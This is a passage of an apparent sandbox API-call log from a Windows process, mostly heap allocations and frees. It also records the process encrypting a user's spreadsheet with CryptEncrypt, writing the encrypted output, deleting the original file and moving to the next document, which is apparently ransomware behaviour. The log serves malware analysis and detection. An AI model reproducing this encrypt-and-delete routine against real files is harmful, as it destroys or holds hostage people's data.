lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37b8 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36c8 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36f8 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3650 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0082.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3788 | out: hHeap=0x1780000) returned 1 [0082.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0082.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0082.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0082.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0082.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0082.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0082.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0082.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0082.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0082.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0082.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0082.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0082.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0082.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0082.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0082.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0082.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0082.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0082.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0082.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0082.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0082.021] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0082.021] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.021] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0082.021] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.022] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0082.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43c3878, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0082.022] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e088*=0x6285, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e088*=0x6290) returned 1 [0082.022] CharLowerBuffW (in: lpsz="byte[25233]", cchLength=0xb | out: lpsz="byte[25233]") returned 0xb [0082.023] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.023] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0082.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43c3998, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0082.023] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49ac7b8*, pdwDataLen=0x144e088*=0x6285, dwBufLen=0x6290 | out: pbData=0x49ac7b8*, pdwDataLen=0x144e088*=0x6290) returned 1 [0082.023] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0082.023] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0082.023] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.024] WriteFile (in: hFile=0x298, lpBuffer=0x49a02a0*, nNumberOfBytesToWrite=0x6290, lpNumberOfBytesWritten=0x144ea8c, lpOverlapped=0x0 | out: lpBuffer=0x49a02a0*, lpNumberOfBytesWritten=0x144ea8c*=0x6290, lpOverlapped=0x0) returned 1 [0082.025] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0082.025] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.025] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0082.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cb2a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0082.025] CryptDestroyKey (hKey=0x41ac140) returned 1 [0082.032] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0082.032] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0082.032] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.032] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0082.032] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0082.032] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.032] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.032] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0082.032] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0082.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796ee8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0082.032] CryptReleaseContext (hProv=0x41a4ae0, dwFlags=0x0) returned 1 [0082.032] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.033] FreeLibrary (hLibModule=0x756e0000) returned 1 [0082.033] CloseHandle (hObject=0x258) returned 1 [0082.033] CloseHandle (hObject=0x298) returned 1 [0082.034] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\lWEK-JelBvY6EHJ.xlsx", nBufferLength=0x7fff, lpBuffer=0x143ea88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\lWEK-JelBvY6EHJ.xlsx", lpFilePart=0x0) returned 0x45 [0082.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0082.034] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\lWEK-JelBvY6EHJ.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\lwek-jelbvy6ehj.xlsx")) returned 0x20 [0082.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0082.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0082.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0082.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0082.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0082.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0082.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0082.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0082.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0082.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0082.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4051040 [0082.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0082.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0082.035] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\lWEK-JelBvY6EHJ.xlsx", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf795b670, ftCreationTime.dwHighDateTime=0x1d5ecb4, ftLastAccessTime.dwLowDateTime=0xe75f1d20, ftLastAccessTime.dwHighDateTime=0x1d5f05e, ftLastWriteTime.dwLowDateTime=0xe75f1d20, ftLastWriteTime.dwHighDateTime=0x1d5f05e, nFileSizeHigh=0x0, nFileSizeLow=0x6285, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="lWEK-JelBvY6EHJ.xlsx", cAlternateFileName="LWEK-J~1.XLS")) returned 0x41ac740 [0082.035] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\lWEK-JelBvY6EHJ.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\lwek-jelbvy6ehj.xlsx")) returned 1 [0082.042] FindNextFileW (in: hFindFile=0x41ac740, lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf795b670, ftCreationTime.dwHighDateTime=0x1d5ecb4, ftLastAccessTime.dwLowDateTime=0xe75f1d20, ftLastAccessTime.dwHighDateTime=0x1d5f05e, ftLastWriteTime.dwLowDateTime=0xe75f1d20, ftLastWriteTime.dwHighDateTime=0x1d5f05e, nFileSizeHigh=0x0, nFileSizeLow=0x6285, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="lWEK-JelBvY6EHJ.xlsx", cAlternateFileName="LWEK-J~1.XLS")) returned 0 [0082.042] FindClose (in: hFindFile=0x41ac740 | out: hFindFile=0x41ac740) returned 1 [0082.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0082.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0082.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0082.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0082.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0082.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0082.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0082.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0082.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0082.042] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0082.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0082.042] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0082.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0082.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0082.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0082.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0082.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0082.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0082.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0082.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0082.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0082.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cc1c8 | out: hHeap=0x1780000) returned 1 [0082.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0082.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0082.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0082.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0082.043] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0082.043] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0082.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0082.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0082.043] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0082.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0082.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0082.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0082.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2890 [0082.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0082.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0082.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0082.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0082.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0082.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0082.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0082.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0082.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431df50 [0082.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0082.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0082.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0082.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0082.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x120) returned 0x43cc1c8 [0082.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431df50 | out: hHeap=0x1780000) returned 1 [0082.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0082.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0082.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0082.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0082.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabe0 [0082.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0082.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0082.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0082.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0082.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0082.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0082.044] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0082.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0082.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0082.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0082.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0082.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0082.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0082.044] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0082.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0082.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0082.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0082.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0082.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0082.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0082.045] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\rar_tJIXYd14cWJz.odp", lpFindFileData=0x144e970 | out: lpFindFileData=0x144e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7e98cd0, ftCreationTime.dwHighDateTime=0x1d5e5de, ftLastAccessTime.dwLowDateTime=0xc53e63e0, ftLastAccessTime.dwHighDateTime=0x1d5e7a8, ftLastWriteTime.dwLowDateTime=0xc53e63e0, ftLastWriteTime.dwHighDateTime=0x1d5e7a8, nFileSizeHigh=0x0, nFileSizeLow=0xadba, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="rar_tJIXYd14cWJz.odp", cAlternateFileName="RAR_TJ~1.ODP")) returned 0x41ac600 [0082.045] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0082.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0082.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0082.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0082.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0082.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0082.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0082.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ea8 [0082.045] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0082.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ea8 | out: hHeap=0x1780000) returned 1 [0082.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0082.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0082.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2900 [0082.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0082.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0082.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 